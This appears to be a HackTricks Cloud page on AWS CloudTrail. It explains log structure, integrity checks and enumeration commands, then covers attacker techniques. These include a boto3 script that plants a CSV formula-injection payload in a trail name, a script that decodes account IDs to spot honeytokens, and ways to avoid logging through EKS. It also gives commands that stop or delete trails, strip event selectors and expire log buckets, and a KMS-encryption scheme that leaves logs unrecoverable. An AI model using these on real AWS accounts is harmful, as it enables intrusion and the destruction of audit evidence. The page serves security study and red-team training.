{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
AWS CloudTrail records and monitors activity within your AWS environment. It captures detailed event logs, including who did what, when, and from where, for all interactions with AWS resources. This provides an audit trail of changes and actions, aiding in security analysis, compliance auditing, and resource change tracking. CloudTrail is essential for understanding user and resource behavior, enhancing security postures, and ensuring regulatory compliance.
Each logged event contains:
- The name of the called API:
eventName
- The called service:
eventSource
- The time:
eventTime
- The IP address:
SourceIPAddress
- The agent method:
userAgent
. Examples:- Signing.amazonaws.com - From AWS Management Console
- console.amazonaws.com - Root user of the account
- lambda.amazonaws.com - AWS Lambda
- The request parameters:
requestParameters
- The response elements:
responseElements
Event's are written to a new log file approximately each 5 minutes in a JSON file, they are held by CloudTrail and finally, log files are delivered to S3 approximately 15mins after.
CloudTrails logs can be aggregated across accounts and across regions.
CloudTrail allows to use log file integrity in order to be able to verify that your log files have remained unchanged since CloudTrail delivered them to you. It creates a SHA-256 hash of the logs inside a digest file. A sha-256 hash of the new logs is created every hour.
When creating a Trail the event selectors will allow you to indicate the trail to log: Management, data or insights events.
Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S3) so AWS will decrypt the content for the people that has access to it, but for additional security you can use SSE with KMS and your own keys.
The logs are stored in a S3 bucket with this name format:
BucketName/AWSLogs/AccountID/CloudTrail/RegionName/YYY/MM/DD
- Being the BucketName:
aws-cloudtrail-logs-<accountid>-<random>
- Example:
aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/
Inside each folder each log will have a name following this format: AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz
Log File Naming Convention
Moreover, digest files (to check file integrity) will be inside the same bucket in:
- Create a Trial in the AWS account where you want the log files to be delivered to
- Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access
- Create a new Trail in the other AWS accounts and select to use the created bucket in step 1
However, even if you can save al the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into a CloudWatch Logs belonging to a single AWS account.
{% hint style="danger" %} Remember that an account can have different Trails from CloudTrail enabled storing the same (or different) logs in different buckets. {% endhint %}
When creating a CloudTrail, it's possible to indicate to get activate cloudtrail for all the accounts in the org and get the logs into just 1 bucket:
This way you can easily configure CloudTrail in all the regions of all the accounts and centralize the logs in 1 account (that you should protect).
You can check that the logs haven't been altered by running
{% code overflow="wrap" %}
aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]
{% endcode %}
CloudTrail can automatically send logs to CloudWatch so you can set alerts that warns you when suspicious activities are performed.
Note that in order to allow CloudTrail to send the logs to CloudWatch a role needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to:
- CreateLogStream: This allows to create a CloudWatch Logs log streams
- PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream
CloudTrail Event History allows you to inspect in a table the logs that have been recorded:
CloudTrail Insights automatically analyzes write management events from CloudTrail trails and alerts you to unusual activity. For example, if there is an increase in TerminateInstance
events that differs from established baselines, you’ll see it as an Insight event. These events make finding and responding to unusual API activity easier than ever.
The insights are stored in the same bucket as the CloudTrail logs in: BucketName/AWSLogs/AccountID/CloudTrail-Insight
CloudTrail Log File Integrity |
|
---|---|
Stop unauthorized access |
|
Prevent log files from being deleted |
|
AWS Access Advisor relies on last 400 days AWS CloudTrail logs to gather its insights. CloudTrail captures a history of AWS API calls and related events made in an AWS account. Access Advisor utilizes this data to show when services were last accessed. By analyzing CloudTrail logs, Access Advisor can determine which AWS services an IAM user or role has accessed and when that access occurred. This helps AWS administrators make informed decisions about refining permissions, as they can identify services that haven't been accessed for extended periods and potentially reduce overly broad permissions based on real usage patterns.
{% hint style="success" %} Therefore, Access Advisor informs about the unnecessary permissions being given to users so the admin could remove them {% endhint %}
# Get trails info
aws cloudtrail list-trails
aws cloudtrail describe-trails
aws cloudtrail list-public-keys
aws cloudtrail get-event-selectors --trail-name <trail_name>
aws [--region us-east-1] cloudtrail get-trail-status --name [default]
# Get insights
aws cloudtrail get-insight-selectors --trail-name <trail_name>
# Get data store info
aws cloudtrail list-event-data-stores
aws cloudtrail list-queries --event-data-store <data-source>
aws cloudtrail get-query-results --event-data-store <data-source> --query-id <id>
It's possible to perform a CVS injection inside CloudTrail that will execute arbitrary code if the logs are exported in CSV and open with Excel.
The following code will generate log entry with a bad Trail name containing the payload:
import boto3
payload = "=cmd|'/C calc'|''"
client = boto3.client('cloudtrail')
response = client.create_trail(
Name=payload,
S3BucketName="random"
)
print(response)
For more information about CSV Injections check the page:
{% embed url="https://book.hacktricks.xyz/pentesting-web/formula-injection" %}
For more information about this specific technique check https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/
Honeyokens are created to detect exfiltration of sensitive information. In case of AWS, they are AWS keys whose use is monitored, if something triggers an action with that key, then someone must have stolen that key.
However, Honeytokens like the ones created by Canarytokens, SpaceCrab, SpaceSiren are either using recognizable account name or using the same AWS account ID for all their customers. Therefore, if you can get the account name and/or account ID without making Cloudtrail create any log, you could know if the key is a honeytoken or not.
Pacu has some rules to detect if a key belongs to Canarytokens, SpaceCrab, SpaceSiren:
- If
canarytokens.org
appears in the role name or the account ID534261010715
appears in the error message.- Testing them more recently, they are using the account
717712589309
and still has thecanarytokens.com
string in the name.
- Testing them more recently, they are using the account
- If
SpaceCrab
appears in the role name in the error message - SpaceSiren uses uuids to generate usernames:
[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}
- If the name looks like randomly generated, there are high probabilities that it's a HoneyToken.
You can get the Account ID from the encoded inside the access key as explained here and check the account ID with your list of Honeytokens AWS accounts:
import base64
import binascii
def AWSAccount_from_AWSKeyID(AWSKeyID):
trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix
x = base64.b32decode(trimmed_AWSKeyID) #base32 decode
y = x[0:6]
z = int.from_bytes(y, byteorder='big', signed=False)
mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False)
e = (z & mask)>>7
return (e)
print("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML")))
Check more information in the orginal research.
The most effective technique for this is actually a simple one. Just use the key you just found to access some service inside your own attackers account. This will make CloudTrail generate a log inside YOUR OWN AWS account and not inside the victims.
The things is that the output will show you an error indicating the account ID and the account name so you will be able to see if it's a Honeytoken.
In the past there were some AWS services that doesn't send logs to CloudTrail (find a list here). Some of those services will respond with an error containing the ARN of the key role if someone unauthorised (the honeytoken key) try to access it.
This way, an attacker can obtain the ARN of the key without triggering any log. In the ARN the attacker can see the AWS account ID and the name, it's easy to know the HoneyToken's companies accounts ID and names, so this way an attacker can identify id the token is a HoneyToken.
{% hint style="danger" %} Note that all public APIs discovered to not being creating CloudTrail logs are now fixed, so maybe you need to find your own...
For more information check the original research. {% endhint %}
Certain AWS services will spawn some infrastructure such as Databases or Kubernetes clusters (EKS). A user talking directly to those services (like the Kubernetes API) won’t use the AWS API, so CloudTrail won’t be able to see this communication.
Therefore, a user with access to EKS that has discovered the URL of the EKS API could generate a token locally and talk to the API service directly without getting detected by Cloudtrail.
More info in:
{% content-ref url="../../aws-post-exploitation/aws-eks-post-exploitation.md" %} aws-eks-post-exploitation.md {% endcontent-ref %}
aws cloudtrail delete-trail --name [trail-name]
aws cloudtrail stop-logging --name [trail-name]
{% code overflow="wrap" %}
aws cloudtrail update-trail --name [trail-name] --no-is-multi-region --no-include-global-services
{% endcode %}
{% code overflow="wrap" %}
# Leave only the ReadOnly selector
aws cloudtrail put-event-selectors --trail-name <trail_name> --event-selectors '[{"ReadWriteType": "ReadOnly"}]' --region <region>
# Remove all selectors (stop Insights)
aws cloudtrail put-event-selectors --trail-name <trail_name> --event-selectors '[]' --region <region>
{% endcode %}
In the first example, a single event selector is provided as a JSON array with a single object. The "ReadWriteType": "ReadOnly"
indicates that the event selector should only capture read-only events (so CloudTrail insights won't be checking write events for example).
You can customize the event selector based on your specific requirements.
{% code overflow="wrap" %}
aws s3api put-bucket-lifecycle --bucket <bucket_name> --lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}]}' --region <region>
{% endcode %}
- Delete the S3 bucket
- Change bucket policy to deny any writes from the CloudTrail service
- Add lifecycle policy to S3 bucket to delete objects
- Disable the kms key used to encrypt the CloudTrail logs
You could generate an asymmetric key and make CloudTrail encrypt the data with that key and delete the private key so the CloudTrail contents cannot be recovered cannot be recovered.
This is basically a S3-KMS ransomware explained in:
{% content-ref url="../../aws-post-exploitation/aws-s3-post-exploitation.md" %} aws-s3-post-exploitation.md {% endcontent-ref %}
KMS ransomware
This is an easiest way to perform the previous attack with different permissions requirements:
{% content-ref url="../../aws-post-exploitation/aws-kms-post-exploitation.md" %} aws-kms-post-exploitation.md {% endcontent-ref %}
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.